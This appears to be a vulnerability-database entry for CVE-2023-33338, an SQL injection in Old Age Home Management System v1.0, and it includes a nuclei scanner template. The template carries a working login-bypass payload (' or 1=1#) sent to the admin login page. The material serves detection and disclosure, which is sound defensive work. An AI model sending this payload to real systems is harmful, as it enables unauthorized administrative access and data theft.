Lucene search
K

Old Age Home Management System v1.0 - SQL Injection

🗓️ 02 Jun 2026 10:14:34Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Old Age Home Management System v1.0 vulnerable to SQL Injection via username parameter. Exploiting this could lead to unauthorized access, data leakage or data manipulation

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-33338
23 May 202316:25
circl
CNNVD
Old Age Home Management SQL注入漏洞
23 May 202300:00
cnnvd
CVE
CVE-2023-33338
23 May 202300:00
cve
Cvelist
CVE-2023-33338
23 May 202300:00
cvelist
NVD
CVE-2023-33338
23 May 202313:15
nvd
Prion
Sql injection
23 May 202313:15
prion
Positive Technologies
PT-2023-24305 · Unknown · Old Age Home Management
23 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-33338
23 May 202502:03
redhatcve
Vulnrichment
CVE-2023-33338
23 May 202300:00
vulnrichment
id: CVE-2023-33338

info:
  name: Old Age Home Management System v1.0 - SQL Injection
  author: Harsh
  severity: critical
  description: |
    Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Old Age Home Management System v1.0.
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33338
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-33338
    cwe-id: CWE-89
    epss-score: 0.753
    epss-percentile: 0.98902
    cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpgurukul
    product: old_age_home_management_system
  tags: cve2023,cve,oahms,sqli,auth-bypass,phpgurukul,vuln

http:
  - raw:
      - |
        POST /admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=vaday%27+or+1%3D1%23&password=password&submit=
      - |
        GET /admin/dashboard.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "Change Password")'
          - 'contains(body_2, "Old Age Home Management System|| Dashboard")'
        condition: and
# digest: 4b0a00483046022100ceaf4ade3f890df9bf6072e744f5257936b1dd7e3f65fe9e9f6de3278135582d022100d5bf98261ddc03818cd5fbea3b9e256f5a9207cf2382fc85765d1151e7d1e5f8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.753
SSVC
26